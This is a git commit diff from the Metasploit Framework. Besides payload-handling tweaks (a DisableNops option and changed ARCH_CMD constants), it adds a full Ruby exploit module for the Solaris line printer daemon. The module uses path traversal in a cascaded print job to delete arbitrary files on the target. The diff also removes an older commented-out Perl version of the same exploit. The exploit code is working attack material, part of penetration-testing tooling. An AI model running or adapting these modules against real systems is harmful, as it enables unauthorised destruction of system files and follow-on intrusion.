Miscellaneous fixes, changes to CMD payloads
git-svn-id: file:///home/svn/incoming/trunk@3296 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
09d21fbced
commit
9fc93bbe56
|
@ -51,6 +51,11 @@ module Exploit
|
|||
# job.
|
||||
#
|
||||
def self.exploit_simple(exploit, opts)
|
||||
|
||||
p exploit.methods.sort
|
||||
p exploit.payload?
|
||||
p exploit.payload_info
|
||||
|
||||
# Make sure parameters are valid.
|
||||
if (opts['Payload'] == nil)
|
||||
raise MissingPayloadError,
|
||||
|
|
|
@ -110,6 +110,8 @@ class EncodedPayload
|
|||
|
||||
# Get the minimum number of nops to use
|
||||
min = (reqs['MinNops'] || 0).to_i
|
||||
min = 0 if reqs['DisableNops']
|
||||
|
||||
|
||||
# Check to see if we have enough room for the minimum requirements
|
||||
if ((reqs['Space']) and
|
||||
|
@ -164,6 +166,9 @@ class EncodedPayload
|
|||
self.nop_sled_size = reqs['MaxNops']
|
||||
end
|
||||
|
||||
# Check for the DisableNops setting
|
||||
self.nop_sled_size = 0 if reqs['DisableNops']
|
||||
|
||||
# Now construct the actual sled
|
||||
if (self.nop_sled_size > 0)
|
||||
pinst.compatible_nops.each { |nopname, nopmod|
|
||||
|
|
|
@ -68,23 +68,14 @@ ARCH_X86 = 'x86'
|
|||
ARCH_MIPS = 'mips'
|
||||
ARCH_PPC = 'ppc'
|
||||
ARCH_SPARC = 'sparc'
|
||||
ARCH_CMD = 'cmd'
|
||||
ARCH_TYPES =
|
||||
[
|
||||
ARCH_X86,
|
||||
ARCH_MIPS,
|
||||
ARCH_PPC,
|
||||
ARCH_SPARC
|
||||
ARCH_SPARC,
|
||||
ARCH_CMD,
|
||||
]
|
||||
|
||||
|
||||
ARCH_CMD_UNIX = 'cmd_unix'
|
||||
ARCH_CMD_LINUX = 'cmd_linux'
|
||||
ARCH_CMD_BSD = 'cmd_bsd'
|
||||
ARCH_CMD =
|
||||
[
|
||||
ARCH_CMD_UNIX,
|
||||
ARCH_CMD_LINUX,
|
||||
ARCH_CMD_BSD
|
||||
]
|
||||
|
||||
ARCH_ALL = ARCH_TYPES + ARCH_CMD
|
||||
ARCH_ALL = ARCH_TYPES
|
||||
|
|
|
@ -0,0 +1,102 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Solaris::Lpd::CascadeDelete < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Solaris LPD Arbitrary File Delete',
|
||||
'Description' => %q{
|
||||
This module uses a vulnerability in the Solaris line printer
|
||||
daemon to delete arbitrary files on an affected system. This
|
||||
can be used to exploit the rpc.walld format string flaw, the
|
||||
missing krb5.conf authentication bypass, or simply delete
|
||||
system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm', 'Optyx <optyx@uberhax0r.net>' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
|
||||
],
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic Target', { }]
|
||||
],
|
||||
'DisclosureDate' => '',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(515),
|
||||
OptString.new('RPATH', [ true, "The remote file path to delete"]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
# Create a simple control file...
|
||||
control = "Hmetasploit\nPr00t\n";
|
||||
|
||||
# The job ID is squashed down to three decimal digits
|
||||
jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
|
||||
|
||||
# Establish the first connection to the server
|
||||
sock1 = connect(false)
|
||||
|
||||
# Request a cascaded job
|
||||
sock1.put("\x02metasploit:framework\n")
|
||||
res = sock1.get_once
|
||||
if (not res)
|
||||
print_status("The target did not accept our job request command")
|
||||
return
|
||||
end
|
||||
|
||||
# Theoretically, we could delete multiple files at once, however
|
||||
# the lp daemon will append garbage from memory to the path name
|
||||
# if we don't stick a null byte after the path. Unfortunately, this
|
||||
# null byte will prevent the parser from processing the other paths.
|
||||
control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n"
|
||||
|
||||
dataf = "http://metasploit.com/\n"
|
||||
|
||||
print_status("Deleting #{datstore['RPATH']}...")
|
||||
if (not (
|
||||
send_file(sock1, 2, "cfA" + jid + "metasploit", control) and
|
||||
send_file(sock1, 3, "dfa" + jid + "metasploit", dataf)
|
||||
) )
|
||||
sock1.close
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Successfully deleted #{datastore['RPATH']} >:-]")
|
||||
sock1.close
|
||||
end
|
||||
|
||||
def send_file (s, type, name, data='')
|
||||
|
||||
s.put(type.chr + data.length.to_s + " " + name + "\n")
|
||||
res = s.get_once(1)
|
||||
if (not (res and res[0] == 0))
|
||||
print_status("The target did not accept our control file command (#{name})")
|
||||
return
|
||||
end
|
||||
|
||||
s.put(data)
|
||||
s.put("\x00")
|
||||
res = s.get_once(1)
|
||||
if (not (res and res[0] == 0))
|
||||
print_status("The target did not accept our control file data (#{name})")
|
||||
return
|
||||
end
|
||||
|
||||
print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length))
|
||||
return true
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -1,198 +0,0 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Solaris LPD Arbitrary File Delete',
|
||||
'Description' => %q{
|
||||
This module uses a vulnerability in the Solaris line printer
|
||||
daemon to delete arbitrary files on an affected system. This
|
||||
can be used to exploit the rpc.walld format string flaw, the
|
||||
missing krb5.conf authentication bypass, or simple delete
|
||||
system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm', 'Optyx <optyx@uberhax0r.net>' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Automatic Targetting',
|
||||
{
|
||||
'Platform' => 'solaris',
|
||||
'Ret' => 0x0,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => '',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::solaris_lpd_unlink;
|
||||
use base "Msf::Exploit";
|
||||
use IO::Socket;
|
||||
use IO::Select;
|
||||
use strict;
|
||||
use Pex::Text;
|
||||
|
||||
my $advanced = { };
|
||||
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'Solaris LPD Arbitrary File Delete',
|
||||
'Version' => '$Revision$',
|
||||
'Authors' =>
|
||||
[
|
||||
'H D Moore <hdm [at] metasploit.com>',
|
||||
'Optyx <optyx [at] uberhax0r.net>'
|
||||
],
|
||||
|
||||
'Arch' => [ ],
|
||||
'OS' => [ 'solaris' ],
|
||||
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
||||
'RPORT' => [1, 'PORT', 'The LPD server port', 515],
|
||||
'RPATH' => [1, 'DATA', 'The remote path name to delete'],
|
||||
},
|
||||
|
||||
'Description' => Pex::Text::Freeform(qq{
|
||||
This module uses a vulnerability in the Solaris line printer daemon
|
||||
to delete arbitrary files on an affected system. This can be used to exploit
|
||||
the rpc.walld format string flaw, the missing krb5.conf authentication bypass,
|
||||
or simple delete system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
|
||||
}),
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
|
||||
],
|
||||
|
||||
'DefaultTarget' => 0,
|
||||
'Targets' => [['No Target Needed']],
|
||||
|
||||
'Keys' => ['lpd'],
|
||||
};
|
||||
|
||||
sub new {
|
||||
my $class = shift;
|
||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
||||
return($self);
|
||||
}
|
||||
|
||||
sub Exploit {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
my $target_path = $self->GetVar('RPATH');
|
||||
my $res;
|
||||
|
||||
# We use one connection to configure the spool directory
|
||||
my $s = Msf::Socket::Tcp->new
|
||||
(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => $self->GetVar('SSL'),
|
||||
);
|
||||
if ($s->IsError) {
|
||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
||||
return;
|
||||
}
|
||||
|
||||
# Send a job request that will trigger the cascade adaptor (thanks Dino!)
|
||||
$s->Send("\x02"."metasploit:framework\n");
|
||||
$res = $s->Recv(1, 5);
|
||||
if (ord($res) != 0) {
|
||||
$self->PrintLine("[*] The target did not accept our job request command");
|
||||
return;
|
||||
}
|
||||
|
||||
# The job ID is squashed down to three decimal digits
|
||||
my $jid = ($$ % 1000).unpack("H*",pack('N', time() + $$));
|
||||
|
||||
# Create a simple control file...
|
||||
my $control = "Hmetasploit\nPr00t\n";
|
||||
|
||||
# Theoretically, we could delete multiple files at once, however
|
||||
# the lp daemon will append garbage from memory to the path name
|
||||
# if we don't stick a null byte after the path. Unfortunately, this
|
||||
# null byte will prevent the parser from processing the other paths.
|
||||
$control .= "U".("../" x 10)."$target_path\x00\n";
|
||||
|
||||
my $dataf = "http://metasploit.com/\n";
|
||||
|
||||
$self->PrintLine("[*] Sending the malicious cascaded job request...");
|
||||
if ( ! $self->SendFile($s, 2, "cfA".$jid."metasploit", $control) ||
|
||||
! $self->SendFile($s, 3, "dfa".$jid."metasploit", $dataf) ||
|
||||
0
|
||||
) { $s->Close; return }
|
||||
|
||||
$self->PrintLine('');
|
||||
$self->PrintLine("[*] Successfully deleted $target_path >:-]");
|
||||
return;
|
||||
}
|
||||
|
||||
sub SendFile {
|
||||
my $self = shift;
|
||||
my $sock = shift;
|
||||
my $type = shift;
|
||||
my $name = shift;
|
||||
my $data = shift;
|
||||
|
||||
$sock->Send(chr($type) .length($data). " $name\n");
|
||||
my $res = $sock->Recv(1, 5);
|
||||
if (ord($res) != 0) {
|
||||
$self->PrintLine("[*] The target did not accept our control file command ($name)");
|
||||
return;
|
||||
}
|
||||
|
||||
$sock->Send($data);
|
||||
$sock->Send("\x00");
|
||||
$res = $sock->Recv(1, 5);
|
||||
if (ord($res) != 0) {
|
||||
$self->PrintLine("[*] The target did not accept our control file data ($name)");
|
||||
return;
|
||||
}
|
||||
|
||||
$self->PrintLine(sprintf("[*] Uploaded %.4d bytes >> $name", length($data)));
|
||||
return 1;
|
||||
}
|
||||
|
||||
1;
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
|
|
@ -23,14 +23,13 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
|
|||
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => 'unix',
|
||||
'Platform' => ['unix', 'solaris'],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2000,
|
||||
'BadChars' => "",
|
||||
'MinNops' => 0,
|
||||
'MaxNops' => 0,
|
||||
'BadChars' => '',
|
||||
'DisableNops' => true,
|
||||
},
|
||||
'PayloadCompat' =>
|
||||
{
|
||||
|
|
|
@ -45,9 +45,7 @@ class Exploits::Windows::Http::Icecast_Header_Overflow < Msf::Exploit::Remote
|
|||
{
|
||||
'Space' => 2000,
|
||||
'BadChars' => "\x0d\x0a\x00",
|
||||
'MinNops' => 0,
|
||||
'MaxNops' => 0,
|
||||
|
||||
'DisableNops' => true,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
|
|
Loading…
Reference in New Issue